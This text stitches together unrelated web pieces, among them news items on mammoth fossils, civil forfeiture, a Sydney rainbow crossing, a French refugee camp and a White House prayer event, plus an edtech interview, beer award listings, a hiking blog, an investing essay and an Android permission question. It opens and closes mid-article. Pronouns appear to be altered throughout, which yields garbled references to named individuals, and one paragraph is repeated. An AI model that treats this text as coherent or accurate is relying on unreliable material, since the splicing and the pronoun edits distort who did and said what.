Despite the small sample of bones studied, the number was surprising. In modern elephants, the researchers found, only about 3.6 percent have cervical ribs — about 10 times less than what was seen in the last mammoths of the North Sea region. In modern humans, only about 1 in 100 people have cervical ribs.
The presence of cervical ribs is linked with catastrophic developmental mishaps. For example, children with certain types of leukemia and other childhood cancers are more likely to have cervical ribs than healthy kids, according to a 2005 study detailed in the European Journal of Medical Genetics.
There are two likely explanations for the high rate of cervical ribs in late mammoths, Reumer and their colleagues write today (March 25) in the open-access journal PeerJ. One is inbreeding, which brings with it a higher-than-usual rate of genetic defects and cervical ribs compared with the normal population. The other is prenatal stress, perhaps due to famine or disease faced by mother mammoths in the last days before extinction.
"The high incidence and large size of the cervical ribs indicates a strong vulnerability, given the association of cervical ribs with diseases and congenital abnormalities in mammals," the researchers wrote. "The vulnerable condition may well have contributed to the eventual extinction of the woolly mammoths."
Follow Stephanie Pappas on Twitter and Google+. Follow us @livescience, Facebook & Google+. Original article on Live Science.
Copyright 2014 LiveScience, a TechMediaNetwork company. All rights reserved. This material may not be published, broadcast, rewritten or redistributed. ]]>
Signup to receive a daily roundup of the top LGBT+ news stories from around the world
A rainbow pedestrian crossing is likely to be approved for Oxford Street in Sydney.
The proposal came from Lord Mayor Clover Moore, who wishes to mark the 35th anniversary of Mardi Gras.
The rainbow crossing is expected to cover the Taylor Square and Whitlam Square area of Oxford Street. City of Sydney Council has reserved the fund of $75,000 for the development.
In a statement, Moore detailed their joy for the project. They said the crossing is “a new opportunity to further acknowledge and promote Oxford St's GLBT character and its significance to the GLBT community”.
The inspiration for the rainbow crossing came from a temporary rainbow pedestrian crossing placed in the City of West Hollywood during Gay Pride Month. The crossing spanned over San Vincente and San Monica Boulevards.
City of Sydney Council will still need to obtain permission for the Taylor/Whitlam Square project from RMS (Road and Maritime Services). Once a risk assessment and safety procedures have been evaluated, RMS hope to lay down the rainbow crossing in a trail run before installing it permanently.
Christine Forster, Liberal City of Sydney Councillor, argued the project would invite essential business and tourism to the Oxford Street area.
They told the Sydney Star Observer: “If we can spruce Oxford St up that will be great for local business – it's an area that needs revitalisation. People often say that Oxford St looks dull – there are a lot of boarded up shops, and that really doesn't make it look like a thriving business area.”
They also added that “Whitlam Square and Taylor Square is ideal – it's the entry point to that central part of the gay community. A lot of visitors come to Oxford St to get a feel for gay and lesbian Sydney, and having these crossings will help identify that area as the community's heart.”
If given permission, the rainbow crossing will be painted before Mardi Gras in February.
Crime doesn't pay, but being innocent in the wrong place can cost you big time under Michigan's civil forfeiture laws. The sheriff's department of Oakland County, Michigan (in suburban Detroit) froze more than $10,000 in the bank account David Barnes shared with their mother after a November 2014 raid on a building their family owned. Officials allegedly thought a company operating inside the building was involved in drug trafficking. According to ABC 7 Detroit, all charges later filed against Barnes were dropped. But through civil forfeiture, the department continued to freeze their bank account.
Under civil forfeiture, law enforcement can seize property—or freeze private bank accounts— when they have reason to believe the property is tied to wrongdoings. Prosecutors can then forfeit the property (through litigation which legally transfers ownership to the government) even if they don't charge the property owner with, let alone convict them of, a crime. Although a judge ordered Oakland County law enforcement to unfreeze Barnes's bank account in February 2016, Barnes' attorney believes officials intentionally ignored the order for months, resulting in multiple hearings and a court appearance. Barnes didn't get their account back until last week—22 months after the judge initially ordered the return of their property.
Unfortunately, Barnes is not the only Michigander to run afoul of abusive forfeiture laws. In 2013, the federal government used civil forfeiture to seize more than $35,000 from Terry Dehkos' grocery store bank account and more than $70,000 from Mark Zaniewski's independently owned gas station, even though neither had done anything wrong. The government eventually returned the money, following nearly a year of litigation, after the business owners teamed up with the Institute for Justice (IJ) to fight back.
According to IJ's “Policing for Profit” report, the Wolverine State earns a D- for its civil forfeiture laws because of its allowance for forfeiture without a criminal conviction, poor protections for innocent owners whose property was allegedly involved in a crime without their knowledge or consent, and allowing law enforcement agencies to keep as much as 100 percent of forfeiture proceeds. This broken system encourages police to treat citizens like ATMs; from 2001 to 2013, law enforcement pocketed more than $244 million from forfeiture proceedings that have ensnared innocent people like Barnes, Dehkos and Zaniewski.
Earlier this year, Michigan Gov. Rick Snyder signed HB 4629, which eliminated a requirement that property owners pay a cash bond of up to $5,000 before they can challenge a civil forfeiture case in court. Although a good first step, lawmakers should do more to protect innocent people's property rights. Potential improvements include repealing civil forfeiture and replacing it with criminal forfeiture, in which the judge and jury that found a suspect guilty of a crime would also determine whether the defendant's property should be forfeited because of that crime. Lawmakers should also eliminate the policing for profit motive by transferring all forfeiture proceeds to the state general fund instead of the seizing agency's coffers.
Michigan should also ensure its law enforcement cannot circumvent future reform by colluding with federal agents, as often happens across the country. Under the U.S. Department of Justice's equitable sharing program, local police can outsource the court battles over property they seize under Michigan law to federal agencies litigating under federal law. This bait-and-switch enables the federal government to kick back nearly 80 percent of forfeiture proceeds to the state agencies that made the seizure. Between 2000 and 2013, Michigan agencies pocketed more than $127 million this way. Lawmakers can close a portion of this loophole by requiring the use of Michigan's forfeiture law when state and local agencies make stops and seizures under state law.
Fourteen states require a criminal conviction in most or all forfeiture cases. Nebraska, North Carolina and New Mexico abolished civil forfeiture entirely and enacted criminal forfeiture. These three states provide Michigan legislators with a model to follow.
Acadly: Between your work and academic dissertation, you've seen edtech up close at several of the world's leading research universities. How has this diversity of experience shaped your decisions and approach to leading change?
Dr. McCready: What my research and experience have taught me is that those factors influencing the evolution of new, technology enhanced teaching and learning practices differ among institutions. For example, the University of Central Florida (UCF) is a relatively young institution, at just over 50 years old, that is primarily serving the economic needs of the region and state. In 2012, UCF had more than doubled the University's enrollment over the last 20 years, which was possible through online courses and programs. This model of education is very different than Duke University that has traditionally focused on the residential model of education, at least at the undergraduate level.
Understanding the institution's mission, culture and students it serves is essential in determining which strategies or approach might work best in leading change.
Shortly after I arrived at Oxford, the University endorsed a strategy for Digital Education (2016–2020), which specifies 5 main areas for development:
The Strategy emphasizes that change in teaching practice must be led from the bottom-up, originating with practitioners. It also recognizes that the University needs to provide an enabling support structure to foster the willingness and enthusiasm of staff to embrace new technology use. These are two essential elements in our ability to successfully lead change.
The first step toward implementing the Strategy was to understand more fully the current patterns of technology use in teaching and learning, and to get a sense of the most important areas for resourcing from the perspective of academic staff and students. We met with the academic committees for each Division and led a consultation survey in order to gain a better understanding of the priorities from the perspective of academics and students. We now have a better sense of the priorities, which is guiding our work and informing decisions about the allocation of limited resources.
This work includes leading a review of the University's Virtual Learning Environment, increasing and enhancing the level of learning technology support available, and supporting both formative and summative assessment through specialised software, as the primary form of assessment at Oxford is through hand-written examinations. It is also important to ensure that the pace at which we proceed in leading this change is appropriate, and that we have sufficient information to make decisions regarding the implementation of any new technologies to support educational objectives, including policy-related considerations.
Acadly: You've studied both culture and institutional processes at Duke, Berkeley and UCF in your dissertation. Between changing culture and processes, what's the bigger challenge in driving the adoption of edtech? And what should be the areas of focus for university leadership when it comes to change management?
Dr. McCready: Both are difficult, but I have found leading cultural change (or the way we have always done things) to be the bigger challenge. In some cases, we are asking individuals to unlearn skills that are deeply embedded into their day-to-day activities, which is extremely difficult. If there is evidence-based research that explains how the changes you are proposing have led to an improved learning experience for students, then that is often helpful in explaining why change is necessary.
For many institutions, long-term improvements to technology-enhanced learning will come slowly and require a significant commitment by both administrators and academics. While there isn't a one-size-fits-all solution, an institution's ability to successfully lead change will require a shared understanding of why change is necessary, including how it will benefit the students' learning experience, which ultimately should help in determining the priorities for change.
Acadly: At one point, your thesis mentions that the modes of communication in the formal LMS at Duke “mismatched with how today's students are communicating”, and that is something we've spoken about in the past too (1, 2). Do you think the very design of Learning Management Systems and the rate at which they seem to be evolving is a big issue today?
Dr. McCready: I believe the design of Learning Management Systems (or Virtual Learning Environments in the UK) is changing (although perhaps not as fast as we would like) and that this change aligns with many of the predictions made in the report entitled “Next Generation Digital Learning Environments” prepared in 2015 by EDUCAUSE. Rather than a single application or platform, we suddenly have access to a collection of tools (a learning ecosystem) that seamlessly integrates a variety of applications, while providing some level of personalization.
What I find interesting is how many applications we have to choose from today and how we go about evaluating which of these applications might be most suitable.
Take, for example, web conferencing technologies specifically designed to support teaching and learning. I remember a time when there were only one or two applications that were considered best-of-breed for supporting synchronous online sessions, yet today, there are several applications available and it has become our job to understand the unique differences among these applications, while in some cases, supporting more than one tool. Fortunately, it is much easier to provision these tools through the LMS/VLE, thanks to Learning Tools Interoperability (LTI), a specification developed by the IMS Global Learning Consortium.
Acadly: We agree completely that LTI has allowed the integration of multiple edtech products into a single interface, but is it not true that a large portion of the faculty use only the basic functionality of the LMS?
Dr. McCready: The question of whether the LMS is being utilised to its greatest capability is one that many institutions are struggling with. Not to mention, some level of uncertainty in whether the tools available through the LMS are being used in the most beneficial or appropriate manner. That's why it is essential to have staff members who understand both pedagogy and technology and the important relationship between the two. We begin our conversations with faculty by asking them what it is they want the students to know and be able to do, and then begin to consider whether technology might play a role in supporting the learning objectives.
At the same time, the staff also need to keep abreast of emerging technologies, while carefully considering how these tools might be applied to achieve specific educational objectives… and that takes a lot of effort!
The more data you have on how your LMS is being utilised to support specific learning objectives, the more prepared you are to comment on whether the platform is being used to its fullest capability.
Acadly: That's a great point! In your dissertation, you note how the shortage of instructional designers or support staff can limit an institution's ability to lead change. This is another trend we've touched upon (3) in the past. Is it a better solution to hire more IDs or is it perhaps better to make it compulsory for professors to get trained in the domain?
Dr. McCready: I believe that having learning technologists embedded within a department or academic division makes a big difference in leading change, and at Oxford, that is apparent in the Medical Sciences Division (MSD), which has established a small team of learning technologists to support their academics.
Today, the MSD is one of the most advanced areas in their use of educational technologies, and we believe that is primarily because they have made it easy for their academics to obtain support within the Division.
Acadly: Another observation in your dissertation was that “for the vast majority of face-to-face courses, teaching practices haven't changed through the use of technology.” What are the desirable changes in teaching practices that technology (or for that matter, anything else) should aim for?
Dr. McCready: Yes, many of the faculty I met with during my research suggested that teaching practices haven't changed for the majority of face-to-face courses. One faculty member described how the level of utilisation typically fell into one of three categories or levels:
First level, which enhanced current teaching practices, most often through the introduction of digital content into the course
Second level, which began to transform the classroom experience by making it more active or engaging, e.g., the use of student response systems in large, lecture-based courses
Third level, which began to deemphasize the traditional classroom experience in favor of active learning, while supporting flexible scheduling, where part of the course would be delivered online and part would be delivered in person, what is often referred to as a “blended” course.
For many individuals, it is leading step-change that occurs by slowly introducing technology into one's teaching and building on that experience over time.
Acadly: Often, faculty members contest the value edtech brings to their teaching, despite growing research evidence to the contrary. Do you think universities are doing a good job of “closing the loop” with concrete evidence and learning analytics?
Dr. McCready: At the time I studied U.C. Berkeley, the faculty members I spoke with weren't sure that online learning was what was best for their students. With anything new, there is always a need to examine evidenced based research and consider how this information applies to your specific educational objectives.
Universities are beginning to close the loop, although the level of change they choose and the pace of implementation often depend on a number of factors, including the academic mission and educational objectives.
Acadly: To probe you a little further on this — what do we really need to measure to get a fair model that can help predict student success? What sorts of data do you think we need? Since data is scattered across products, how far or close are we to the point where we can have all learning data under one roof?
Dr. McCready: I think institutions first have to agree on the problem they are trying to solve or the questions they are trying to answer in regard to student success. Beyond that, it is also important to understand what data your institution currently has access to across the various systems that support students in their learning.
I attended a session at EdTechX Europe on “Intelligent Tutoring for Personalized Learning” that reinforces how essential it is to be able to use data about learners in order to help facilitate their learning.
There is also data that comes from formative assessment, which might be accommodated with live polling tools during class or by designing simulations that emulate real world practice. Regardless of how you assess learning, these technologies provide an increasing amount of data that should help inform practice.
For Oxford, it will likely take some time to determine what data our academics would like to review on a recurring basis. What distinguishes Oxford from other institutions is its tutorial model of teaching at the undergraduate level. Students meet individually or in small groups with their tutors, and thus, there is already a greater level of engagement and personalisation to their learning process.
Acadly: You've spent most of your career working in the US. How has your experience at Oxford been? Do you feel the cultural differences between the two countries impacts your work, or does it have more to do with the differences between university culture, rather than national culture?
Dr. McCready: A lot of people are curious how my experience at Oxford compares to other institutions I have worked for, and my answer often varies, as my role and the nature of my work continues to evolve. I believe the diversity of my experience has influenced how I go about solving problems, which is to gather as much information as possible through an ever-increasing global network.
Academic IT is very much an outward facing team, consulting with peer institutions in the UK, US and Australia to name a few. At the end of the day, we are all working toward improving the student's learning experience, so that is something we all share in common.
Acadly: Thank you so much Dr. McCready. It was a pleasure speaking with you!
True 3D Modeling on Holographic is Here!
VertoStudio VR is a fully-capable holographic 3D modeling studio and generalized augmented reality tool! No mirroring or external software is required of any kind. You can use it to import FBX, OBJ, DAE (and more) directly as holograms, then configure every aspect of the visual display of these holograms directly down to the individual polygons.
Augmented Reality Like You've Never Experienced Before
Verto Studio for Holographic provides real world measurements in meters for positioning and scale of holograms which allows, for the first time, to-scale 3D content display and manipulation. It's something truly incredible you have to experience first hand to believe. This, combined with display and intersection of real-world mixed reality objects within the room, allows for one of the most realistic 3D modeling experiences in existence.
Verto Studio 3D Makes Holographic Content Accessible
Any 3D file that you have sitting on your PC or Tablet is now instantly a hologram-capable file. Verto Studio can perform optimizations such as reducing polygon count directly on the holographic device to enable turning just about any kind of 3D model into a hologram-ready experience. All existing Verto Studio 3D files and shaders are instantly converted for holographic display. Cloud integration including Verto Studio Cloud allows you to quickly get your 3D content into your room in front of you as soon as possible.
2016 Atlantic Canadian Beer Award Winners
What a weekend! From Friday afternoon, until Saturday night, 21 beer judges came together to sample the more than 250 beer and cider entries in this year's Atlantic Canadian Beer Awards. At the Gala Sunday evening, awards were handed out for the top beers in the region. Here are the winners!
1) North American & European Style Lager
Gold: Moosehead Breweries – Moose Light
Silver: Oland Brewery – Schooner
Bronze: Propeller Brewing – Nocturne Dark Lager
2) German Style Specialty Ales
Gold: Uncle Leo's Brewery – Altbier
Silver: Uncle Leo's Brewery – Vohs Weizenbier
Bronze: Garrison Brewing – Rise ‘N' Stein
3) UK Style Specialty Ales
Gold: Pump House Brewery – Barley Wine Ale
Silver: Garrison Brewing – Irish Red Ale
Bronze: Trider's Craft Beer – Rod's Red
4) North American Style Specialty Ale
Gold: Upstreet Craft Brewing – One Way Black IPA
Silver: Spindrift Brewing – Riptide IPL
Bronze: Good Robot Brewing – Leave Me Blue
5) Belgian Style Specialty Ale
Gold: Petit-Sault – Tante Blanche
Silver: Upstreet Craft Brewing – De Novo I
Bronze: Tatamagouche Brewing – Tatamagouche Tripel
6) North American Style Amber / Red Ale
Gold: PEI Brewing – Island Red
Silver: Boxing Rock Brewing – Temptation Red Ale
Bronze: Paddy's Pub – Annapolis Valley Ale (AVA)
7) Fruit & Field Beer
Gold: Lazy Bear Brewing – Braunbär Honey Brown
Silver: Big Spruce Brewing – The Silver Tart
Bronze: Petit-Sault – Bonhomme Sept-Heures
8) Pale Ales
Gold: Hell Bay Brewing – English Ale
Silver: Bad Apple Brewhouse – American Pale Ale
Bronze: Big Spruce Brewing – Gimme Citra
9) Stout / Porter
Gold: Alexander Keith's – Lunenburg Coffee & Cacao Stout
Silver: Breton Brewing – Cocoa Envy Chocolate Robust Porter
Bronze: Tatamagouche Brewing – Two Rivers Baltic Porter
10) India Pale Ale
Gold: Rockbottom Brewpub – Fathom IPA
Silver: Tatamagouche Brewing – Deception Bay IPA
Bronze: Bad Apple Brewhouse – Mosaic DIPA
11) Experimental Beer
Gold: Bad Apple Brewhouse – Smoked Porter
Silver: Good Robot Brewing – Damn Fine Coffee and Cherry Pie v2.0
Bronze: Propeller Brewing – Graceland Too White IPA
12) Wood & Barrel-Aged Beer
Gold: Big Spruce – Ra Ra Rasputin Barrel-Aged Russian Imperial Stout
Silver: Bad Apple Brewhouse – Smoke Show
Bronze: Big Spruce Brewing – Coade Word: Snowmageddon Barrel-Aged Winter Warmer
13) Standard Cider and Perry
Gold: ShipBuilders Cider – ShipBuilders
Silver: Paddy's Pub – Fitzgerald Traditional Cider
Bronze: Elderkin's Cider – Elderkin's Traditional Hard Cider
14) Specialty Cider and Perry
Gold: Annapolis Cider – Crisp & Dry
Silver: Annapolis Cider – Something Different – Peach & Peppercorn
Bronze: Red Rover Brewhouse – Fall Cider
Brewery of the Year
Bad Apple Brewhouse
Brewpub of the Year
Rockbottom Brewpub
Cider House of the Year
Annapolis Cider Company
Beer of the Year
Ra Ra Rasputin Barrel-Aged Russian Imperial Stout (Big Spruce)
Cider of the Year
ShipBuilders Cider (ShipBuilders)
People's Choice Beer
T. rex Porter (Port Rexton)
People's Choice Cider
Crisp & Dry (Annapolis Cider Company)
Congratulations to all of the winners!
2016 Atlantic Canadian Beer Awards by the numbers:
228 Beer entries from 35 Breweries and Brewpubs
29 Cider entries from 7 Cider Houses
21 BJCP National, Certified, Recognized, and Novice Judges
10 dedicated flight attendants behind the scenes
12 hours of judging
900 cups of beer and cider sniffed, swigged and sampled
30,000 steps (20 km) walked by the Judging Organizer (acbbchris)
49 Awards
1 Great Industry Worth Celebrating!
A new refugee camp in northern France is causing major security concerns for locals and authorities who feel it puts residents' safety at risk and could become a springboard for those attempting to get to the UK.
The camp is in Grande-Synthe, near Dunkirk, and has been dubbed "The Little Brother" of the "Jungle" camp in Calais. It is said to be hosting 3,000 people, and numbers are increasing every day.
RT's Anastasia Churkina, reporting from Grande-Synthe, said there are many asylum seekers in the streets. The locals are extremely unhappy with the situation.
“In my opinion, this situation is very poorly organized. They keep arriving here,” a local woman told RT, while another simply said, “These people are a problem.”
A young man added they are scared because “a problem with security has been created.”
“There are a lot of people here, in lots of difficult situations. It's not their fault, I think, but they are contributing to attacks.”
As for the camp itself, it seems to be poorly maintained. It has been raining for weeks in the area, and hundreds have already been forced to quit their tents, which are standing in muddy water. Exacerbating the situation is the fact that there is only one toilet per 100 migrants.
Volunteers from Europe and the UK, as well as the asylum seekers themselves, say the crisis is worsened by local security, who are denying entry of essential supplies.
“The police are here all the time. Their primary aim is to restrict aid coming into the camp, so we can't bring any tents or any construction material into the camp. We're not able to improve the conditions of people there,” volunteer Mandy Harris told RT.
A by-law issued by the Dunkirk authorities at the end of December stipulates that the only supplies allowed into the camp are food and clothing carried by hand.
“The security here treats us very badly. They don't let us go out or allow other people to give us things like blankets,” an asylum seeker at the camp said.
French authorities have pledged to upgrade the campsite with warmer tents, showers, and appropriate toilets, but some locals fear this would boost the refugee influx.
In Android, there used to be a permission with the name BRICK that could be used to potentially disable the device. Other than hearing it as an urban myth, I do not really know if this permission can really be used to brick a device.
All I can think of are the following reasons:
To build a LoJack kind of application that can remote disable a phone should it discover that the phone was stolen.
For enterprises to be able to remote-wipe a phone should the phone get lost somewhere.
Is there any other sane reason why a third-party app would require to use it? And why was it removed (not sure) from GingerBread?
Also, what does it really do anyways? Reset the phone to its factory settings?
The most monotonous day was the 7.5-mile hike to Russell Pond campground. On the way, we stopped to have lunch at the Pogy Pond lean-to, which was one of the most beautiful spots I've seen in the park and offered great views of Mt. Katahdin over the pond.
Katahdin over Pogy Pond
The trail was flat and repetitive, and I was so excited when I caught my first glimpse of the pond that I let out a loud gasp.
We had a two-day reservation on a tent site a short walk from the water. While the roomy lean-tos looked tempting, we decided we wanted to put our new tent to work. We had picked out the newest model of the two-person L.L. Bean Microlight , and so far have been nothing but pleased with our little home. It is surprisingly light and affordable.
This is when the pizza infatuation set in. After only a few days of eating backpacking-friendly meals, I was craving pizza straight from the oven. The House of Pizza in nearby Millinocket makes some of the best pizza I've ever had, and I couldn't stop thinking about getting a big, greasy pie as soon as I left the park.
I saw more wild animals at Russell than in the whole trip combined. Deer, hummingbirds, and chipmunks came out to enjoy the springtime warmth. We saw at least three different moose come to cool down in the pond at dusk, the best time for moose sightings.
Just hanging out by the dock
Enjoying the sunset over Russell Pond Austin and I canoed leisurely around the pond on our zero day, and dropped each other off on granite rocks in the middle to bathe in the sun while our partner paddled around. It got so nice we considered going for a swim, that is until we noticed the huge leeches drifting around. We decided to pass. I had a close encounter with a moose in the woods, too. I was crouched on a log washing dishes for dinner when I heard twigs crunching behind me. Thinking it was Austin returning from filtering stream water, I looked over. Instead, it was a huge bull moose walking through the bushes. Alarmed, I stood up quickly. They stopped in their tracks and stared at me, head cocked. I imagined them thinking, “That's a funny-looking moose …” and I remembered Austin telling me literally a few moments before how moose might attack if threatened. I started running out of the woods, and the moose started running in the opposite direction. Seems like we were both surprised by the encounter.Austin and I canoed leisurely around the pond on our zero day, and dropped each other off on granite rocks in the middle to bathe in the sun while our partner paddled around. It got so nice we considered going for a swim, that is until we noticed the huge leeches drifting around. We decided to pass.
WASHINGTON, D.C. — President Donald Trump held the first National Day of Prayer event at the White House in many years on Thursday in the Rose Garden with approximately 150 guests in attendance.
The President announced their first trip overseas, which will take them to Saudi Arabia, Israel, and the Vatican. The trip will come ahead of the NATO G7. The President thanked all those gathered, spoke of the commemoration of the National Day of Prayer occurring the the White House for the first time in years, and took a moment during the course of their speech to bring the Little Sisters of the poor onboard as they spoke of their new religious freedom Executive Order.
Steven Curtis Chapman opened the ceremonies with a version of the song Great is Thy Faithfulness. They then sang the words of The Lord's Prayer, inviting those gathered to join in singing along—which some did.
Steven Curtis Chapman singing Great is Thy Faithfulness at White House National Day of Prayer event @StevenCurtis pic.twitter.com/5q9StS5Gfz — Michelle Moons (@MichelleDiana) May 4, 2017
Pastor Paula White then took to the podium thanking those cabinet members present for attending. They noted that this year the National Day of Prayer event is taking place in the Rose Garden at the White House. They spoke of the rarity of holding these prayers this day on the lawn of the White House.
Prayers were given by evangelical pastor Jack Graham to comfort those who are persecuted, that God's love would be expressed to people. Catholic Cardinal Donald Wuerl offered prayers of God's promises and leading, that people would walk in the full freedom of God, in the fullness of peace, in the fullness of freedom, mindful of those who do not experience the same freedom. Prayers were offered for President Donald Trump's leadership. Jewish Rabbi Marvin Hier followed with prayers for President Trump and Vice President Mike Pence, others in the Administration, and others around the country.
Vice President Mike Pence recounted the long American history of the National Day of Prayer. Every President has issued a proclamation for the day since it began, Pence noted, but not every President has held a commemoration in the Rose Garden of the White House.
President Trump brings Little Sisters of the Poor onboard at National Day of Prayer event at White House #NationalDayofPrayer pic.twitter.com/jwWrvj0dVN — Michelle Moons (@MichelleDiana) May 4, 2017
In their remarks Trump said:
We are a nation of believers. Faith is deeply embedded into the history of our country, the spirit of our founding and the soul of our nation,” they added as they thanked the faith leaders. “As we look at the violence around the world, and believe me it's violent…we realize how truly blessed we are to live in a nation that honors the freedom of worship. Today my administration is leading by example as we take historic steps to protect religious liberty in the United States of America.
“We will not allow people of faith to be targeted, bullied, or silenced anymore,” said Trump. “We will never ever stand for religious discrimination. Tolerance is the cornerstone of peace.”
The President then announced their overseas trip and that they will meet with leaders from across the Muslim world in Saudi Arabia.
Trump mentioned President Abraham Lincoln's announcement of a National Day of Prayer. “It's so great to be doing it in the Rose Garden,” Trump said as they announced the proclamation of this year's National Day of Prayer. The crowd gave a standing ovation upon this announcement.
“Freedom is not a gift from government, freedom is a gift from God,” proclaimed Trump. They referred to the founders of the country who enshrined the freedom of religion in the First Amendment. They spoke of their new executive order on religious freedom.
“No American should be forced to choose between the dictates of the federal government and tenets of their faith.” They spoke of the Johnson Amendment and the impediment it imposes on religious leaders. The President declared, “This financial threat against the faith community is over.” They said they would sign the EO, adding, “You're now in a position that you can say what you want to say.”
“No one should be censoring sermons or targeting pastors,” said Trump.
The President called the Little Sisters of the Poor to the podium and even recognized the lawyers that have been fighting a court case for the group that has faced prosecution for noncompliance with a portion of the Obamacare mandate. The president said to them, “I want you to know that your long ordeal will soon be over.”
“God bless you and God bless America,” concluded President Trump.
President Ronald Reagan held observances of the National Day of Prayer in the Rose Garden, as did President George H. Bush and George W. Bush, according to the National Day of Prayer Task Force. President Bill Clinton invited guests for prayer events at the White House on the National Day of Prayer. While President Barack Obama did sign National Day of Prayer proclamations in the standing presidential tradition, they chose “not to personally participate nor host events for the National Day of Prayer at the White House,” according to the NDOP Task Force.
Follow Michelle Moons on Twitter @MichelleDiana
I believe that having faith in ‘the law of averages' can be deadly. A timeless piece of wisdom I learned was, “if you can't swim, then never cross a river if it is on average 3 ft. deep.”
Meaning the river could be 1 ft. deep along the entirety of it – except in the middle, where it is suddenly 15 ft. deep…
Ah, the law of averages.
Knowing this wisdom – I will try to use the mistakes from trusting averages to my advantage. But, I recommend you read the books and works of Mark Spitznagel, Nassim Taleb, Nate Silver, and Benoit Mandelbrot. These men understand uncertainty and “tail” events in a unique way and how to position yourself.
I tried to make a simple Normal Distribution vs. Fat Tail Distribution graph to help explain this costly error that the “statistically” dependent make.
To put it lightly: I hunt for fat tails. I look for topics, mostly stocks or even sports betting, to use the crowd's faith in the numbers against them.
But it isn't easy. You have to have an independent, knowledgeable, reasonably realistic opinion, and a bit of luck that the market is not pricing in certain risks.
A couple examples I like to use is remember the holy-grail of pharma-stocks, Valeant (VRX)? How the seemingly unstoppable rising stock price collapsed90% within a couple of months – better known as “V-Day” for investors.
What about Enron? or even the entirety of 2008?
Outside of finance – remember when Ronda Rousey was knocked out cold by Holly Holm during UFC 193? It was an unthinkable event. Ronda was the undefeated champion. They were considered the greatest ever. And so on.
I gambled on that fight. The odds of Ronda winning were so high that I would have had to bet $500 to simply make $100 profit. I don't know about you, but betting $500 to only make 1/5th of my money in profit with a 50/50 chance of being right or wrong, isn't attractive.
But that is what the bookies offered…
It isn't even about taking the underdog all the time. It's about finding the asset that the market becomes emotional and complacent over. The market was so crazy about Ronda that no one cared to think, “what if they slip? Are we underestimating them opponent? What if Ronda is having a bad night? Have they lost their competitive advantage since now people study their fighting style?”
I asked these questions. I also thought that betting $100 to make $500 made much more sense.
I guess using the past averages of their wins and the crowds euphoria, betting on Ronda winning seemed like a sure thing. Even the independent thinker could have seen how the odds of Ronda winning were still fairly good.
But not that good to bet $500 for $100…
That is what “hunting for fat tails” is about. It isn't really the event happening itself, but you're betting against the sentiment of it. I didn't bet against Ronda losing per se. I bet against the markets sentiment and the price it cost to i.e. the risk/reward.
For stocks I buy long dated out-of-the-money options on the assets that are priced for perfection. These are my way of betting.
Another example, look at Chipotle (CMG) recently.
Of course these types of sudden “tail” events don't occur often. If they did the market would price it in. But it sure as hell happens more than the numbers tell us.
Usually the ones advocating that the risks of things not going right are higher than everyone assumes are laughed at.
That is, until it happens…
Today I am advocating going against the markets sentiment that volatility (VIXM) is dead and instead to go long volatility assets.
I don't trust averages, but in the last year alone the VIX spiked over $15 on five different occasions. That is over 50% from current VIX prices today.
Is this as rare and un-probable as the market is making it out to be? I don't think so.
And to our benefit, the longer the lowVol goes on, the higher the chance of volatility spiking occurs. That is, the more individuals feel that volatility is gone, the riskier they get, which naturally breeds higher volatility in the future.
I detail this in a previous article about the infamous “Minsky moment.”
I like to say that the lowVol times is the author of highVol times; and
vice versa…
When investors feel safe from turbulence, they make riskier decisions. It is like how wearing a helmet while bike riding can make you do things you wouldn't do without a helmet on. Contrary to that, if investors fear turbulence and uncertainty, they become risk averse and freeze up and wait. Such is human nature.
One breeds the other: the risk aversion leads to quiet markets and only the least risky things survive, which eventually calms markets down. Once the calm and stability is reached, investors slowly move back into riskier assets. Rinse – wash – repeat.
And today I believe the VIX is horribly underestimating the future as well as gold (GLD) and the VanEck Junior Mining ETF (GDXJ). I am long both through out-of-money long dated call options and own put options on various other stocks, especially car related.
This week the Vix index, the most popular short-hand measure of expectations for near-term volatility for US stocks, has traded close to the lowest level since Bill Clinton was elected in 1993, prompting a further furrowing of brows from those exasperated at such apparently reckless levels of market relaxation – wrote the Financial Times.
Growth is weak. Inflation is softening. Retail sales and real incomes are weak. And yet the S&P500 (SPY) is trading at all-time highs.
So who is chasing stocks higher in a time of such low volatility? It appears it is companies borrowing money to buy their own stock back…
The lack of volatility is something we have heard the Fed speak about over the last month. It is their fear that markets have become “complacent”.
Three weeks ago, the president of the San Francisco Fed said they were “somewhat concerned about the complacency in the market…there seems to be a priced-to-perfection attitude out there…” and “the stock market is very much running on fumes.” That same day, the vice chair of the Fed said, “We know that complacency must be avoided.” Last week, the president of the Kansas City Fed said the “combination of asset valuations…together with low levels of implied volatility in equity and bond markets, could be signaling broader complacency in financial markets.” – wrote Brian Reynolds, Canaccord Genuity analyst
They have flat out said it, and no one seemed to care. The Fed is worried that the markets are becoming calm in times where diligence is needed. What if the Fed had to switch from tightening to easing? Markets would puke all over themselves because of how complacent they have gotten with things as is or expect to be.
They are walking a fine line…
With the Fed tightening, volatility seemingly dead, the economy weak, and complacency with a stock market bubble, these are recipes for a market crash.
And as I wrote above, tail events, such as the Fed actually reversing its tightening and switching into easing mode, are not as unlikely as the market thinks.
Just look at the T-bill yield today. US default risk has flatlined for weeks. But now with Trump not being able to get anything done with Congress and the Senate (who's surprised there), the market is having debt-ceiling anxiety.
The CBO stated that the US Treasury will run out of cash by mid-October.
Ending with that: Although volatility is quiet, it seems like the tails for extreme event probabilities are higher than the crowd complacently assumes.
A Malaysian woman has been jailed for two years for hooking up with the "teapot worshipping" Sky Kingdom cult, contrary to Sharia law which prohibits born Muslims converting to other religions.
Former teacher Kamariah Ali, 57, was cuffed in 2005 when the powers that be clamped down on the cult and demolished its two-storey sacred teapot symbolising the "purity of water" and "love pouring from heaven".
While Malaysia has constitutional guarantees of freedom of worship, apostasy is off the menu for the Muslim population. Mrs Ali previously served 20 months in 1992 for the offence, and Sharia High Court judge Mohammed Abdullah had no hesitation handing down further time.
They said he'd "considered aspects of public interest and the sentiments of Muslims in the country", and told the defendant: "The court is not convinced that the accused has repented and is willing to abandon any teachings contrary to Islam. I pray God will open the doors of your heart, Kamariah."
Ali's lawyer, Sa'adiah Din, protested to reporters: "This has to stop. They can't be sending them again and again to prison for this. They informed the court that they are not a Muslim. They don't come under Sharia court anymore."
An appeal hearing will tomorrow "consider [Ali's] plea for a lighter sentence and to defer the date of their sentencing", the Malaysia Star notes. ®
And the IT angle?
Who cares? You get one chance in your career to write the Malaysian teapot-worship headline, and by the Lord Harry and Saint George this hack wasn't going to let it pass.
The rate hike came as several officials voiced concern over the effect, or lack thereof, that their recent measures were having on financial markets. Rather than causing conditions to tighten, they actually have grown looser since the central bank embarked on a series of hikes.
